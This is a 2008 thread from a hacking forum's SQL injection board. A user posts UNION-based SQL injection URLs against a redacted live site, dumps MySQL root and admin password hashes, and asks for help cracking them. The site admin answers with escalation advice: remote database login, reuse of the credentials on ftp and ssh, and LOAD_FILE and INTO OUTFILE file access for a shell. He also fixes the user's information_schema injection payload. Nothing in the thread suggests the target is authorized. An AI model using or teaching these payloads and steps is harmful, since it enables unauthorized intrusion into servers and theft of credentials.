|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
help me crack pass and..... |
|
Posted: Fri Mar 07, 2008 8:29 am |
|
|
cavevip |
Regular user |
|
|
Joined: Mar 01, 2008 |
Posts: 10 |
|
|
|
|
|
|
|
Code: | http://********/news/index.php?month=-1%20union%20select%201,2,3,4,concat(user,0x3a,pass word),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+mysql.user/* |
root:07c02f3e4a89a46b
help me crack pass
what url login user anh pass mysql ??
No real URL-s!!!
edited by waraxe |
|
|
|
|
|
|
|
|
Posted: Fri Mar 07, 2008 12:40 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
If you get MySql username and password, then you can log in remotely, if server has TCP port 3306 open and there is no IP address restrictions. And there can be chance, that lazy admin is using same credentials in other places - ftp, ssh, DirectAdmin, ...
And of course - search for PhpMyAdmin.
By the way it's possible that you have MySql FILE privileges. So you can use "LOAD_FILE()" for reading local files from server and "INTO OUTFILE" for writing files to server. More info:
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://dev.mysql.com/doc/refman/5.0/en/select.html
In this way you may escalate your presence from MySql root user level to (database) server low-privileged user level and have shell access to server. |
|
|
|
|
|
|
|
|
Posted: Sat Mar 08, 2008 9:32 pm |
|
|
cavevip |
Regular user |
|
|
Joined: Mar 01, 2008 |
Posts: 10 |
|
|
|
|
|
|
|
thank waraxe !!!
help me crack pass admin
Code: | a9f38a73974a4ee584b4d39173cdab7bb55e464d
f027884f76f29c9a68472d126eaded96a61194a3
f657c18ef139897c18519e71e9eb9cc014d03e55
|
thank you !!!
======================================
Code: | -125+union+all+select+1,2,3,column_name,5+from+information_schema.columns+where+table_SCHEMA=usefulInfo+limit+1,1/* |
1054: Code: | Unknown column 'usefulInfo' in 'where clause' |
column in table not ???
version 5
help |
|
|
|
|
Posted: Sun Mar 09, 2008 12:12 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
You must use single quotes around text string:
Code: |
125+union+all+select+1,2,3,column_name,5+from+information_schema.columns+where+table_SCHEMA='usefulInfo'+limit+1,1/*
|
or use "0x****" hex-encoded string, if php magic_quotes is making problems. |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|